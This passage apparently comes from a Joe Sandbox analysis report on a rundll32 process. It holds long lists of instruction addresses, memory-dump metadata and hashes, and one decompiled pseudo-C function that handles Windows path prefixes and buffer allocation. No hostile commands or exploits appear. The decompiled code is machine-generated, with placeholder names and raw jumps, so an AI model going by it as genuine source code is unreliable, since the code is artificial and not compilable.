                                                                                                                0x044d5c5b
                                                                                                                0x044d5c5b
                                                                                                                0x044d5c2c
                                                                                                                0x044d5cb7
                                                                                                                0x044d5cb9
                                                                                                                0x044d5cbf
                                                                                                                0x044d5cc2
                                                                                                                0x044d5cca
                                                                                                                0x044d5ccb
                                                                                                                0x044d5ccb
                                                                                                                0x044d5cd1
                                                                                                                0x044d5cd7
                                                                                                                0x044d5cda
                                                                                                                0x044d5ce1
                                                                                                                0x044d5ce4
                                                                                                                0x044d5ce7
                                                                                                                0x044d5ced
                                                                                                                0x044d5cf3
                                                                                                                0x044d5cf9
                                                                                                                0x044d5cff
                                                                                                                0x044d5d08
                                                                                                                0x044d5d0a
                                                                                                                0x044d5d0e
                                                                                                                0x044d5d10
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044d5d16
                                                                                                                0x044d5d1a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044d5d20
                                                                                                                0x044d5d22
                                                                                                                0x044d5d25
                                                                                                                0x044d5d2f
                                                                                                                0x044d5d2f
                                                                                                                0x044d5d33
                                                                                                                0x044d5d3d
                                                                                                                0x044d5d49
                                                                                                                0x044d5d4b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044d5d5a
                                                                                                                0x044d5d5d
                                                                                                                0x044d5d60
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044d5d66
                                                                                                                0x044d5d69
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044d5d6f
                                                                                                                0x044d5d6f
                                                                                                                0x044d5d73
                                                                                                                0x044d5d79
                                                                                                                0x044d5d7f
                                                                                                                0x044d5d86
                                                                                                                0x044d5d95
                                                                                                                0x044d5d98
                                                                                                                0x044d5dba
                                                                                                                0x044d5dcb
                                                                                                                0x044d5dce
                                                                                                                0x044d5dd3
                                                                                                                0x044d5dd6
                                                                                                                0x044d5dd8
                                                                                                                0x044d5de6
                                                                                                                0x044d5dec
                                                                                                                0x044d5dee
                                                                                                                0x044d5df1
                                                                                                                0x044d5df3
                                                                                                                0x044d635a
                                                                                                                0x044d635a
                                                                                                                0x00000000
                                                                                                                0x044d635a
                                                                                                                0x044d5dfe
                                                                                                                0x044d5e02
                                                                                                                0x044d5e05
                                                                                                                0x044d5e07
                                                                                                                0x044d5e10
                                                                                                                0x044d5e13
                                                                                                                0x044d5e1b
                                                                                                                0x044d5e1c
                                                                                                                0x044d5e21
                                                                                                                0x044d5e22
                                                                                                                0x044d5e23
                                                                                                                0x044d5e25
                                                                                                                0x044d5e2a
                                                                                                                0x044d5e2c
                                                                                                                0x044d5e2e
                                                                                                                0x044d5e36
                                                                                                                0x044d5e39
                                                                                                                0x044d5e42
                                                                                                                0x044d5e47
                                                                                                                0x044d5e4d
                                                                                                                0x044d5e54
                                                                                                                0x044d5e54
                                                                                                                0x044d5e54
                                                                                                                0x044d5e2e
                                                                                                                0x044d5e5c
                                                                                                                0x044d5e5f
                                                                                                                0x044d5e62
                                                                                                                0x044d5e64
                                                                                                                0x044d5e6b
                                                                                                                0x044d5e70
                                                                                                                0x044d5e7a
                                                                                                                0x044d5e7a
                                                                                                                0x044d5e7a
                                                                                                                0x044d5e6b
                                                                                                                0x044d5e7e
                                                                                                                0x044d5e7f
                                                                                                                0x044d5e7f
                                                                                                                0x044d5e81
                                                                                                                0x044d5e87
                                                                                                                0x044d5e8b
                                                                                                                0x044d5e8c
                                                                                                                0x044d5e8c
                                                                                                                0x044d5e8c
                                                                                                                0x044d5e9a
                                                                                                                0x044d5e9c
                                                                                                                0x044d5ea2
                                                                                                                0x044d5ea6
                                                                                                                0x044d5f50
                                                                                                                0x044d5f50
                                                                                                                0x044d5f57
                                                                                                                0x044d5f66
                                                                                                                0x044d5f66
                                                                                                                0x044d5f66
                                                                                                                0x044d5f68
                                                                                                                0x044d5f6a
                                                                                                                0x044d63d0
                                                                                                                0x00000000
                                                                                                                0x044d5f70
                                                                                                                0x044d5f70
                                                                                                                0x044d5f91
                                                                                                                0x044d5f9c
                                                                                                                0x044d5f9e
                                                                                                                0x044d5fa4
                                                                                                                0x044d5fa6
                                                                                                                0x044d638c
                                                                                                                0x044d6392
                                                                                                                0x044d63a1
                                                                                                                0x044d63a7
                                                                                                                0x044d63af
                                                                                                                0x044d63af
                                                                                                                0x044d63bd
                                                                                                                0x044d63d8
                                                                                                                0x00000000
                                                                                                                0x044d63d8
                                                                                                                0x044d5fac
                                                                                                                0x044d5fb2
                                                                                                                0x044d5fb4
                                                                                                                0x044d5fbd
                                                                                                                0x044d5fc6
                                                                                                                0x044d5fce
                                                                                                                0x044d5fd4
                                                                                                                0x044d5fdc
                                                                                                                0x044d5fec
                                                                                                                0x044d5fed
                                                                                                                0x044d5fee
                                                                                                                0x044d5fef
                                                                                                                0x044d5ff9
                                                                                                                0x044d5ffa
                                                                                                                0x044d5ffb
                                                                                                                0x044d5ffc
                                                                                                                0x044d6000
                                                                                                                0x044d6004
                                                                                                                0x044d6012
                                                                                                                0x044d6012
                                                                                                                0x044d6018
                                                                                                                0x044d6019
                                                                                                                0x044d601a
                                                                                                                0x044d601b
                                                                                                                0x044d601c
                                                                                                                0x044d6020
                                                                                                                0x044d6059
                                                                                                                0x044d605c
                                                                                                                0x044d6061
                                                                                                                0x044d6061
                                                                                                                0x044d6022
                                                                                                                0x044d6022
                                                                                                                0x044d6022
                                                                                                                0x044d6025
                                                                                                                0x044d602a
                                                                                                                0x044d602b
                                                                                                                0x044d6031
                                                                                                                0x044d6037
                                                                                                                0x044d6038
                                                                                                                0x044d603e
                                                                                                                0x044d6048
                                                                                                                0x044d6049
                                                                                                                0x044d604a
                                                                                                                0x044d604b
                                                                                                                0x044d604c
                                                                                                                0x044d604d
                                                                                                                0x044d6053
                                                                                                                0x044d6054
                                                                                                                0x044d6054
                                                                                                                0x044d6062
                                                                                                                0x044d6065
                                                                                                                0x044d6067
                                                                                                                0x044d606a
                                                                                                                0x044d6070
                                                                                                                0x044d6075
                                                                                                                0x044d6076
                                                                                                                0x044d6081
                                                                                                                0x044d6087
                                                                                                                0x044d6095
                                                                                                                0x044d6099
                                                                                                                0x044d609e
                                                                                                                0x044d60a4
                                                                                                                0x044d60ae
                                                                                                                0x044d60b0
                                                                                                                0x044d60b3
                                                                                                                0x044d60b6
                                                                                                                0x044d60b8
                                                                                                                0x044d60ba
                                                                                                                0x044d60ba
                                                                                                                0x044d60ba
                                                                                                                0x044d60ba
                                                                                                                0x044d60be
                                                                                                                0x044d60c0
                                                                                                                0x044d60c5
                                                                                                                0x044d60c5
                                                                                                                0x044d60c5
                                                                                                                0x044d60c6
                                                                                                                0x044d60cd
                                                                                                                0x044d6114
                                                                                                                0x044d60cf
                                                                                                                0x044d60cf
                                                                                                                0x044d60d4
                                                                                                                0x044d60d5
                                                                                                                0x044d60da
                                                                                                                0x044d60db
                                                                                                                0x044d60e1
                                                                                                                0x044d60e2
                                                                                                                0x044d60e8
                                                                                                                0x044d60f8
                                                                                                                0x044d60fd
                                                                                                                0x044d60fe
                                                                                                                0x044d6102
                                                                                                                0x044d6104
                                                                                                                0x044d6107
                                                                                                                0x044d6109
                                                                                                                0x044d610b
                                                                                                                0x044d610b
                                                                                                                0x044d610b
                                                                                                                0x044d610b
                                                                                                                0x044d610f
                                                                                                                0x044d610f
                                                                                                                0x044d6117
                                                                                                                0x044d611a
                                                                                                                0x044d611f
                                                                                                                0x044d6125
                                                                                                                0x044d6134
                                                                                                                0x044d6139
                                                                                                                0x044d613f
                                                                                                                0x044d6146
                                                                                                                0x044d6148
                                                                                                                0x044d614b
                                                                                                                0x044d614d
                                                                                                                0x044d614f
                                                                                                                0x044d614f
                                                                                                                0x044d614f
                                                                                                                0x044d614f
                                                                                                                0x044d6153
                                                                                                                0x044d6159
                                                                                                                0x044d6159
                                                                                                                0x044d615c
                                                                                                                0x044d6163
                                                                                                                0x044d6169
                                                                                                                0x044d616c
                                                                                                                0x044d6172
                                                                                                                0x044d6181
                                                                                                                0x044d6186
                                                                                                                0x044d6187
                                                                                                                0x044d618b
                                                                                                                0x044d6191
                                                                                                                0x044d6195
                                                                                                                0x044d61a3
                                                                                                                0x044d61bb
                                                                                                                0x044d61c0
                                                                                                                0x044d61c3
                                                                                                                0x044d61cc
                                                                                                                0x044d61d0
                                                                                                                0x044d61dc
                                                                                                                0x044d61de
                                                                                                                0x044d61e1
                                                                                                                0x044d61e4
                                                                                                                0x044d61e6
                                                                                                                0x044d61e8
                                                                                                                0x044d61e8
                                                                                                                0x044d61e8
                                                                                                                0x044d61e8
                                                                                                                0x044d61e6
                                                                                                                0x044d61ec
                                                                                                                0x044d61f3
                                                                                                                0x044d6203
                                                                                                                0x044d6209
                                                                                                                0x044d620a
                                                                                                                0x044d6216
                                                                                                                0x044d621d
                                                                                                                0x044d6227
                                                                                                                0x044d6241
                                                                                                                0x044d6246
                                                                                                                0x044d624c
                                                                                                                0x044d6257
                                                                                                                0x044d6259
                                                                                                                0x044d625c
                                                                                                                0x044d625e
                                                                                                                0x044d6260
                                                                                                                0x044d6260
                                                                                                                0x044d6260
                                                                                                                0x044d6260
                                                                                                                0x044d625e
                                                                                                                0x044d6264
                                                                                                                0x044d6267
                                                                                                                0x044d6269
                                                                                                                0x044d6315
                                                                                                                0x044d6315
                                                                                                                0x044d631b
                                                                                                                0x044d631e
                                                                                                                0x044d6324
                                                                                                                0x044d6327
                                                                                                                0x044d632f
                                                                                                                0x044d6330
                                                                                                                0x044d6333
                                                                                                                0x044d633a
                                                                                                                0x044d633c
                                                                                                                0x044d6335
                                                                                                                0x044d6335
                                                                                                                0x044d6335
                                                                                                                0x044d633f
                                                                                                                0x044d6342
                                                                                                                0x044d634c
                                                                                                                0x044d6352
                                                                                                                0x044d6355
                                                                                                                0x044d6355
                                                                                                                0x044d6359
                                                                                                                0x00000000
                                                                                                                0x044d626f
                                                                                                                0x044d6275
                                                                                                                0x044d6275
                                                                                                                0x044d6278
                                                                                                                0x044d627e
                                                                                                                0x044d627e
                                                                                                                0x044d6281
                                                                                                                0x044d6287
                                                                                                                0x044d628d
                                                                                                                0x044d6298
                                                                                                                0x044d629c
                                                                                                                0x044d62a2
                                                                                                                0x044d629e
                                                                                                                0x044d629e
                                                                                                                0x044d629e
                                                                                                                0x044d62a7
                                                                                                                0x044d62a7
                                                                                                                0x044d62aa
                                                                                                                0x044d62b0
                                                                                                                0x044d62f0
                                                                                                                0x044d62f0
                                                                                                                0x044d62f2
                                                                                                                0x044d62f8
                                                                                                                0x044d62fd
                                                                                                                0x044d62b2
                                                                                                                0x044d62b2
                                                                                                                0x044d62b2
                                                                                                                0x044d62b5
                                                                                                                0x044d62dd
                                                                                                                0x044d62e2
                                                                                                                0x044d62e5
                                                                                                                0x044d62b7
                                                                                                                0x044d62b8
                                                                                                                0x044d62bb
                                                                                                                0x044d62bd
                                                                                                                0x044d62c0
                                                                                                                0x044d62c4
                                                                                                                0x044d62cd
                                                                                                                0x044d62cd
                                                                                                                0x044d62c0
                                                                                                                0x044d62bb
                                                                                                                0x044d62b5
                                                                                                                0x044d6302
                                                                                                                0x044d6303
                                                                                                                0x044d6305
                                                                                                                0x044d6305
                                                                                                                0x044d6305
                                                                                                                0x044d630c
                                                                                                                0x044d630c
                                                                                                                0x00000000
                                                                                                                0x044d627e
                                                                                                                0x044d6269
                                                                                                                0x044d5eac
                                                                                                                0x044d5ebb
                                                                                                                0x044d5ebe
                                                                                                                0x044d5ecb
                                                                                                                0x044d5ecb
                                                                                                                0x044d5ece
                                                                                                                0x044d5ece
                                                                                                                0x044d5ed4
                                                                                                                0x044d5ed7
                                                                                                                0x044d5ed9
                                                                                                                0x044d5edb
                                                                                                                0x044d5edb
                                                                                                                0x044d5ee1
                                                                                                                0x044d5ee1
                                                                                                                0x044d5ee3
                                                                                                                0x044d5f20
                                                                                                                0x044d5f20
                                                                                                                0x044d5ee5
                                                                                                                0x044d5ee5
                                                                                                                0x044d5ee5
                                                                                                                0x044d5ee8
                                                                                                                0x044d5f11
                                                                                                                0x044d5f18
                                                                                                                0x044d5eea
                                                                                                                0x044d5eea
                                                                                                                0x044d5eed
                                                                                                                0x044d5ef2
                                                                                                                0x044d5ef8
                                                                                                                0x044d5efb
                                                                                                                0x044d5f0a
                                                                                                                0x044d5f0a
                                                                                                                0x044d5eed
                                                                                                                0x044d5ee8
                                                                                                                0x044d5f22
                                                                                                                0x044d5f28
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044d5f30
                                                                                                                0x044d5f31
                                                                                                                0x044d5f37
                                                                                                                0x044d5f3a
                                                                                                                0x044d5f3d
                                                                                                                0x044d5f44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044d5f46
                                                                                                                0x044d5f48
                                                                                                                0x044d5f4d
                                                                                                                0x00000000
                                                                                                                0x044d5f4d
                                                                                                                0x044d5dda
                                                                                                                0x044d5ddf
                                                                                                                0x00000000
                                                                                                                0x044d5ddf
                                                                                                                0x044d5dd8
                                                                                                                0x044d5da7
                                                                                                                0x044d5da9
                                                                                                                0x044d5dac
                                                                                                                0x044d5dae
                                                                                                                0x00000000
                                                                                                                0x044d5db4
                                                                                                                0x044d5db4
                                                                                                                0x00000000
                                                                                                                0x044d5db4
                                                                                                                0x044d5dae
                                                                                                                0x044d5d88
                                                                                                                0x044d5d8d
                                                                                                                0x044d6363
                                                                                                                0x044d6369
                                                                                                                0x044d636a
                                                                                                                0x044d6370
                                                                                                                0x044d6372
                                                                                                                0x044d637a
                                                                                                                0x044d637b
                                                                                                                0x044d637d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044d637f
                                                                                                                0x044d6385
                                                                                                                0x00000000
                                                                                                                0x044d6385
                                                                                                                0x044d5d38
                                                                                                                0x044d5d3b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044d5d3b
                                                                                                                0x044d5d27
                                                                                                                0x044d5d29
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044d6360
                                                                                                                0x00000000
                                                                                                                0x044d6360
                                                                                                                0x044d5c10
                                                                                                                0x044d5c10
                                                                                                                0x044d63da
                                                                                                                0x044d63e5
                                                                                                                0x044d63e5

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 43755ab327cb46a01f51f9b08429c1adc8ee16f05fa9fe2a7eeaa0f99286a20c
                                                                                                                • Instruction ID: 3d534a61867ebfb5ed3b3623d6d32e7396c0f3231b6ac888b94c57b17b050073
                                                                                                                • Opcode Fuzzy Hash: 43755ab327cb46a01f51f9b08429c1adc8ee16f05fa9fe2a7eeaa0f99286a20c
                                                                                                                • Instruction Fuzzy Hash: 69422C75A00229DFDF24CF68C890BAAB7B1FF45304F1581AAD94DAB342DB74A985CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04424120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E04424120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x44fd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0443F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04426E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04424620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04426E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M044245F8))) {
												case 0:
													_v568 = 0x43e1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x43e11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04424620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0444F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0444F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E044052A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0441EB70(1, 0x44f79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0441AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E044495D0();
																			L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0444B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04443D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0444B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                                                0x04424128
                                                                                                                0x04424135
                                                                                                                0x0442413c
                                                                                                                0x04424141
                                                                                                                0x04424145
                                                                                                                0x04424147
                                                                                                                0x0442414e
                                                                                                                0x04424151
                                                                                                                0x04424159
                                                                                                                0x0442415c
                                                                                                                0x04424160
                                                                                                                0x04424164
                                                                                                                0x04424168
                                                                                                                0x0442416c
                                                                                                                0x0442417f
                                                                                                                0x04424181
                                                                                                                0x0442446a
                                                                                                                0x0442446a
                                                                                                                0x0442418c
                                                                                                                0x04424195
                                                                                                                0x04424199
                                                                                                                0x04424432
                                                                                                                0x04424439
                                                                                                                0x0442443d
                                                                                                                0x04424442
                                                                                                                0x04424447
                                                                                                                0x00000000
                                                                                                                0x0442419f
                                                                                                                0x044241a3
                                                                                                                0x044241b1
                                                                                                                0x044241b9
                                                                                                                0x044241bd
                                                                                                                0x044245db
                                                                                                                0x044245db
                                                                                                                0x00000000
                                                                                                                0x044241c3
                                                                                                                0x044241c3
                                                                                                                0x044241ce
                                                                                                                0x044241d4
                                                                                                                0x0446e138
                                                                                                                0x0446e13e
                                                                                                                0x0446e169
                                                                                                                0x0446e16d
                                                                                                                0x0446e19e
                                                                                                                0x0446e16f
                                                                                                                0x0446e16f
                                                                                                                0x0446e175
                                                                                                                0x0446e179
                                                                                                                0x0446e18f
                                                                                                                0x0446e193
                                                                                                                0x00000000
                                                                                                                0x0446e199
                                                                                                                0x00000000
                                                                                                                0x0446e199
                                                                                                                0x0446e193
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044241da
                                                                                                                0x044241da
                                                                                                                0x044241df
                                                                                                                0x044241e4
                                                                                                                0x044241ec
                                                                                                                0x04424203
                                                                                                                0x04424207
                                                                                                                0x0446e1fd
                                                                                                                0x04424222
                                                                                                                0x04424226
                                                                                                                0x0446e1f3
                                                                                                                0x0446e1f3
                                                                                                                0x0442422c
                                                                                                                0x0442422c
                                                                                                                0x04424233
                                                                                                                0x0446e1ed
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04424239
                                                                                                                0x04424239
                                                                                                                0x04424239
                                                                                                                0x04424239
                                                                                                                0x04424233
                                                                                                                0x04424226
                                                                                                                0x044241ee
                                                                                                                0x044241ee
                                                                                                                0x044241f4
                                                                                                                0x04424575
                                                                                                                0x0446e1b1
                                                                                                                0x0446e1b1
                                                                                                                0x00000000
                                                                                                                0x0442457b
                                                                                                                0x0442457b
                                                                                                                0x04424582
                                                                                                                0x0446e1ab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04424588
                                                                                                                0x04424588
                                                                                                                0x0442458c
                                                                                                                0x0446e1c4
                                                                                                                0x0446e1c4
                                                                                                                0x00000000
                                                                                                                0x04424592
                                                                                                                0x04424592
                                                                                                                0x04424599
                                                                                                                0x0446e1be
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0442459f
                                                                                                                0x0442459f
                                                                                                                0x044245a3
                                                                                                                0x0446e1d7
                                                                                                                0x0446e1e4
